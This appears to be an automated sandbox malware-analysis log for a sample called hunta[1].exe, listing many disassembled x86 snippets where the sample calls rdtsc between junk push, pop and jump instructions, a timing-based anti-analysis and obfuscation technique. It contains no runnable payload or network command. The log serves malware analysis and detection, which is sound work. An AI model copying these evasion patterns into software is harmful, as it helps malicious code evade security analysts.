            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1177BB6 second address: 1177BD6 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF2E5514DE8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E5514DF0h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CF0CF second address: 11CF0DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11CF0DB second address: 11CF0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11360A2 second address: 11360BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D6420 second address: 11D6424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D6424 second address: 11D6445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D6445 second address: 11D6449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D6449 second address: 11D644F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D6719 second address: 11D671F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D671F second address: 11D672F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D672F second address: 11D6737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D6737 second address: 11D673C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D7046 second address: 11D7056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF2E5514DE6h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11D7384 second address: 11D7390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF2E55A2C2Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E0BE9 second address: 11E0BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF2E5514DE6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E0059 second address: 11E009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF2E55A2C28h 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FF2E55A2C38h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FF2E55A2C33h 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E009B second address: 11E009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E01C3 second address: 11E01C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E01C9 second address: 11E01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E0336 second address: 11E033E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E079D second address: 11E07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E07A3 second address: 11E07B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF2E55A2C32h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E07B6 second address: 11E07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF2E5514DE6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E07C0 second address: 11E07E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF2E55A2C37h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007FF2E55A2C26h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E863F second address: 11E8653 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF2E5514DEAh 0x00000008 jl 00007FF2E5514DECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E6D66 second address: 11E6D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Fh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E6D79 second address: 11E6D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E6D7D second address: 11E6DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E74A3 second address: 11E74A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E74A8 second address: 11E74B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E74B2 second address: 11E74DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FF2E5514DFFh 0x0000000f jmp 00007FF2E5514DF9h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E74DA second address: 11E74F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11E74F6 second address: 11E74FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11F0D9F second address: 11F0DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1201D64 second address: 1201D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1201D68 second address: 1201D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 120177F second address: 12017A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FF2E5514DE8h 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FF2E5514DE8h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 je 00007FF2E5514DE6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12017A0 second address: 12017B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E55A2C26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF2E55A2C26h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12017B3 second address: 12017C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12017C3 second address: 12017C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12017C8 second address: 12017CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12017CE second address: 12017E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF2E55A2C32h 0x0000000b jbe 00007FF2E55A2C26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 120191E second address: 1201937 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF2E5514DEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1201937 second address: 1201951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C36h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1201951 second address: 120196C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 121469F second address: 12146A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12146A3 second address: 12146AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12146AD second address: 12146F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jo 00007FF2E55A2C26h 0x00000014 pop ecx 0x00000015 jmp 00007FF2E55A2C37h 0x0000001a pushad 0x0000001b jmp 00007FF2E55A2C38h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1218C6A second address: 1218C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1218E2B second address: 1218E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1218E2F second address: 1218E35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1218E35 second address: 1218E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF2E55A2C2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1218E43 second address: 1218E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FF2E5514DE6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1218E57 second address: 1218E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1219121 second address: 1219125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1219125 second address: 121912B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 121912B second address: 121912F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 121928A second address: 12192A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12192A9 second address: 12192D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEFh 0x00000007 jmp 00007FF2E5514DEFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12192D1 second address: 12192D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12192D5 second address: 12192D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1219418 second address: 1219441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF2E55A2C31h 0x0000000c jmp 00007FF2E55A2C31h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1219441 second address: 121944B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 121944B second address: 1219450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1219450 second address: 121945A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 121945A second address: 1219460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1130EB6 second address: 1130EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF2E5514DE6h 0x0000000a pop edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1219E98 second address: 1219EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF2E55A2C30h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 121DD49 second address: 121DD5D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF2E5514DE6h 0x00000008 jnc 00007FF2E5514DE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 121DD5D second address: 121DD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 121DD63 second address: 121DD6D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 121DD6D second address: 121DD89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C34h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1233580 second address: 123359D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FF2E5514DF5h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 123359D second address: 12335CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FF2E55A2C26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FF2E55A2C30h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jg 00007FF2E55A2C26h 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12335CD second address: 12335D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12335D3 second address: 12335E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C30h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 12335E8 second address: 12335F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 122FDD6 second address: 122FDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1245C29 second address: 1245C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1245C2D second address: 1245C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D986 second address: 126D98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D98A second address: 126D99E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E55A2C2Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126C7D4 second address: 126C7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF2E5514DE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126CACF second address: 126CB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FF2E55A2C2Bh 0x0000000d pop edi 0x0000000e jmp 00007FF2E55A2C2Eh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FF2E55A2C2Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126CB06 second address: 126CB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF2E5514DE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FF2E5514DE6h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126CB19 second address: 126CB32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126CB32 second address: 126CB38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126CCA3 second address: 126CCA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126CCA9 second address: 126CCB3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E5514DECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126CDFD second address: 126CE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126CE1F second address: 126CE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D100 second address: 126D10B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF2E55A2C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D10B second address: 126D111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D111 second address: 126D119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D587 second address: 126D58B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D58B second address: 126D591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D591 second address: 126D59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 126D59A second address: 126D5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
